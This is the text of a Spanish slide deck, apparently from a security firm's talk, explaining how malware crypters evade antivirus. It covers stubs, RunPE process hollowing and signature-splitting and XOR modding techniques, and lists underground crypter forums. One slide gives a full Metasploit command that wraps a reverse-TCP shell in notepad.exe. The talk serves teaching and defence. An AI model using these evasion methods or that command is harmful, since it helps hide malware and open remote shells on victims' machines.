Professional Documents
Culture Documents
Uso de Crypters
Whoami
ncd:~ apasamar$ whoami
apasamar
apasamar@incide.es
@apasamar
a.k.a brajan
ncd:~ apasamar$ cat apasamar.cv
Ingeniero superior y Mster en
seguridad de la informacin
Socio fundador de INCIDE:
Expertos en prueba electrnica
Forensics / Periciales
Respuesta a incidentes
Consultora/Auditora de Seguridad
!
de qu va esto...
Introduccin
AVs como funcionan
Tipos de malware y deteccin AVs
Medidas de evasin
Auto-cifrado, Polimorfismo, Ofuscacin, Compresin
Crypters
tipos y funcionamiento
stub
stub FUD
tcnicas Modding
Recursos
introduccin
MALWARE = $$$$$$$$$
BOTNETS, APT,
RANSOMWARE
Detectar MALWARE
Malos: INDETECTAR
MALWARE
introduccin
MALWARE = $$$$$$$$$
BOTNETS, APT,
RANSOMWARE
Detectar MALWARE
Malos: INDETECTAR
MALWARE
introduccin
Objetivo de los Malos:
introduccin
Objetivo de los Malos:
AVs howto
Los AntiVirus escanean binarios EN DISCO
NO analizan la memoria, sino los binarios
en disco que arrancan procesos
AV
SCAN
PROCESO
AVs howto
RAM
EJECUTABLE
DISCO
AVs howto
Proceso anlisis de los AVs:
Ataques
AVs howto
Recomendado:
Abusing File Processing in Malware
Detectors for Fun and Profit (2012)
Suman Jana and Vitaly Shmatikov
The University of Texas at Austin
AVs howto
Metasploit Framework (Rapid7)
Community Edition:
msfpayload
windows/shell/
reverse_tcp LHOST=192.168.1.75
LPORT=4444 R | msfencode -c 5 -e
x86/shikata_ga_nai -x notepad.exe
> notepad2.exe
Pro Edition:
Generate
Payloads
AV-evading Dynamic
tipos de malware y
deteccin AVs
Programas espa comerciales: (white list,
firmados)
e-blaster
007
perfect keylogger
tipos de malware y
deteccin AVs
Malware recin creado:
deteccin baja (sin firmas)
posible deteccin heurstica
tipos de malware y
deteccin AVs
Malware existente: (muy conocidos,
firmas y heurstica)
troyanos
downloaders
stealers
reverse shells
...
crypters
builder / stub
Builder:
Encargado de crear el ejecutable
compuesto por el STUB y el
MALWARE CIFRADO
Stub:
Encargado de descifrar el MALWARE
CIFRADO y ejecutarlo
builder / stub
!
CRYPTER
(Builder)!
!
!
!
STUB !
!
!
!
CRYPTER + STUB
exe
dll
recurso
MALWARE DETECTADO
MALWARE CIFRADO
builder / stub
MALWARE CIFRADO
STUB
Separador
Separador
STUB
KEY
MALWARE CIFRADO
builder / stub
Tipos de crypters:
ScanTime
RunTime
stub
ScanTime
STUB
AV
MALWARE CIFRADO
MALWARE DETECTADO
DISCO
RunTime
AV
MALWARE DETECTADO
stub
RAM
STUB
MALWARE CIFRADO
DISCO
stub
Componentes STUB:
Rutina Decrypt
RunPe
!
PROCESO
1
PROCESO
2
EP I
EP 2
CreateProcess (CREATE_SUSPENDED)
GetThreadContext
ReadFile
ResumeThread
WriteProcessMemory
SetThreadContext
BaseAddress 21
+8
PEB
EBX
EAX
FUD
Objetivo: Stub FUD (Full UnDetectable)
Indeteccin desde Fuente (Source)
Indeteccin desde Binario
Cmo?
MODDING
modding source
A mano o con ofuscadores:
RunPE alternativos
APIs Falsas
TLB (Tab Library File)
Trash code
modding binario
Dsplit/AvFucker
SignatureFucker
Hexing
RIT
XOR y variantes
Tips
modding binario
Firmas sencillas
Firmas Mltiples
Heurstica
AVs howto
Recomendado:
Bypassing Anti-Virus
Scanners (2012)
InterNOT Security Team
modding binario
EP
Firmas
OLD EP
stub.exe
Firmas
NEW EP
CIFRADO
stub.exe
Descifrado
modding binario
modding binario
RUTINA DE CIFRADO
NEW EP
INSERTAR RUTINA
.text SECTION
desde 1050
hasta import table
modding binario
modding binario
modding binario
16 AVs KO
modding binario
TCNICAS:
Dsplit/AvFucker
SignatureFucker
Hexing
RIT
XOR y variantes
Tips
modding binario
Tcnica DSplit:
Cabecera
Cuerpo EXE
1000 bytes
Cuerpo EXE
3000 bytes
Cabecera
Cabecera
Cuerpo EXE
Nx1000 bytes
Cuerpo EXE
modding binario
Tcnica AvFucker:
Cabecera
Cuerpo EXE
1000 bytes
Cuerpo EXE
Cabecera 0000000000
1000 bytes
Cabecera
0000000000
Cuerpo EXE
1000 bytes
Cabecera
0000000000
Cuerpo EXE
Cabecera
1000 bytes
Cuerpo EXE
0000000000
modding binario
Tcnica RIT
localizar firma
si son instrucciones partir flujo
saltar a otro punto (hueco)
finalizar las instrucciones
retornar al punto posterior
!
modding binario
Tcnica XOR
localizar firma/s
aplicar XOR con un valor p.e. 22
Modificar EP o saltar a un hueco
aplicar XOR 22
retornar al punto posterior
!
modding binario
Detectado (EP):
otras tcnicas
Aadir APIs Falsas
Edicin Hexadecimal de cadenas
Mover/cambiar direcciones de llamadas
a las funciones
recursos
http://www.indetectables.net
http://www.udtools.net
http://www.masters-hackers.info
http://www.level-23.biz/
http://www.corp-51.net/
http://www.underc0de.org
!
P R E G U NTA S ?
Avda. Diagonal, 640 6 Planta
08017 Barcelona
info@incide.es
http://www.incide.es
http://www.twitter.com/1NC1D3
http://www.atrapadosporlosbits.com
http://www.youtube.com/incidetube
Companies > INCIDE - Investigacin Digital
Tel./Fax. +34 932 546 277 / +34 932 546 314